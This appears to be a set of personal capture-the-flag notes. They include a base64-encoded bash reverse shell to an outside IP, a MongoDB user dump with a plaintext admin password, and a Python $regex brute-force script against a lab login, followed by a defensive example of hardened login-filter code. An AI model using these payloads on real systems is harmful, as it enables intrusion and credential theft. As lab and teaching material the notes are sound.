Encoding the payload part was hard.
URL encoding, changing some special characters, base64…
00:47 NoSQL injection
NoSQL injection - HackTricks
01:20 XML external entity injection
What is XXE (XML external entity) injection? Tutorial & Examples | Web Security Academy
In this section, we'll explain what XML external entity injection is, describe some common examples, explain how to find and exploit various kinds of XXE ...
XML External Entity (XXE) Processing | OWASP Foundation
XML External Entity (XXE) Processing on the main website for The OWASP Foundation. OWASP is a nonprofit foundation that works to improve the security of softwar...
01:52 node-serialize Code Execution vulnerability
node-serialize vulnerabilities | Snyk
Learn more about known vulnerabilities in the node-serialize package. Serialize an object including its function into a JSON.
02:44 reverse shell
'bash -i >& /dev/tcp/10.10.14.8/1234 0>&1'
└─$ echo -n 'bash -i >& /dev/tcp/10.10.14.8/1234 0>&1' | base64
YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC44LzEyMzQgMD4mMQ==
The "+" did a tricky thing. I added one more space to get rid of it.
└─$ echo -n 'bash  -i >& /dev/tcp/10.10.14.8/1234 0>&1' | base64
YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuOC8xMjM0IDA+JjE=
There's still a "+".
└─$ echo -n 'bash  -i >& /dev/tcp/10.10.14.8/1234  0>&1' | base64
YmFzaCAgLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuOC8xMjM0ICAwPiYx
03:08 mongodb
> show dbs
admin 0.000GB
blog 0.000GB
config 0.000GB
local 0.000GB
> use blog
switched to db blog
> show collections
articles
users
> db.users.find()
{ "_id" : ObjectId("61b7380ae5814df6030d2373"), "createdAt" : ISODate("2021-12-13T12:09:46.009Z"), "username" : "admin", "password" : "IppsecSaysPleaseSubscribe", "__v" : 0 }
List Users — MongoDB Manual
03:34 password brute-force script using $regex
$regex — MongoDB Manual
pattern matching on strings in MongoDB 6.0
import sys
import string
import requests

URL = "http://10.10.11.139:5000/login"


def make_password(pswd):
    # Send the candidate as a {"$regex": ...} object instead of a string, so the
    # server-side filter does a prefix pattern match rather than an equality check.
    login_data = {"user": "admin", "password": {"$regex": pswd}}
    req = requests.post(URL, json=login_data)
    if "Invalid Password" in req.text:
        return False
    return True


password = '^'  # anchor so each candidate is matched as a prefix
result = False
while not result:
    for i in string.ascii_letters:
        new_password = password + i
        sys.stdout.write(f"\r{new_password}")
        sys.stdout.flush()
        if make_password(new_password):
            password += i
            break
    else:
        # No letter extended the prefix: the full password has been recovered
        # (or it contains a character outside ascii_letters), so stop looping.
        result = True

print(f"\n{password[1:]}")
Maybe I should add a counter to stop its loop in the end.
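Added example (not from these notes or from the target application): the login-filter construction that lets the $regex trick above work, next to a hardened version that only ever queries with plain strings, both run against an in-memory stand-in for the users collection. The handler and collection shapes are assumptions.

```javascript
// Vulnerable shape: the parsed JSON body goes straight into the Mongo filter,
// so {"password": {"$regex": "^I"}} turns equality into a pattern match.
// (Assumed handler shape, not the target application's actual source.)
function buildLoginFilterVulnerable(body) {
  return { username: body.user, password: body.password };
}

// Recursively flag any key starting with "$" or containing "." (operator or
// path injection) anywhere inside the request body.
function containsOperator(value) {
  if (Array.isArray(value)) return value.some(containsOperator);
  if (value !== null && typeof value === "object") {
    return Object.entries(value).some(
      ([k, v]) => k.startsWith("$") || k.includes(".") || containsOperator(v)
    );
  }
  return false;
}

// Hardened shape: credentials must be plain strings, so the filter can only
// ever express equality. (Comparing a password hash after looking the user up
// by username would be the next step; the dump above stores plaintext.)
function buildLoginFilterHardened(body) {
  if (containsOperator(body)) throw new TypeError("operator injection rejected");
  const { user, password } = body;
  if (typeof user !== "string" || typeof password !== "string") {
    throw new TypeError("credentials must be strings");
  }
  return { username: user, password: password };
}

// In-memory stand-in for db.users so the example runs offline; the document is
// a constructed copy of the db.users.find() output above.
const USERS = [{ username: "admin", password: "IppsecSaysPleaseSubscribe" }];

// Minimal subset of Mongo filter semantics: equality, plus the $regex operator.
function matchesFilter(doc, filter) {
  return Object.entries(filter).every(([field, cond]) => {
    if (cond !== null && typeof cond === "object" && "$regex" in cond) {
      return new RegExp(cond.$regex).test(doc[field]);
    }
    return doc[field] === cond;
  });
}

function findOne(filter) {
  return USERS.find((doc) => matchesFilter(doc, filter)) || null;
}
```

The same `containsOperator` check is what packages such as express-mongo-sanitize apply to `req.body`; rejecting (rather than stripping) keeps the failure visible in logs.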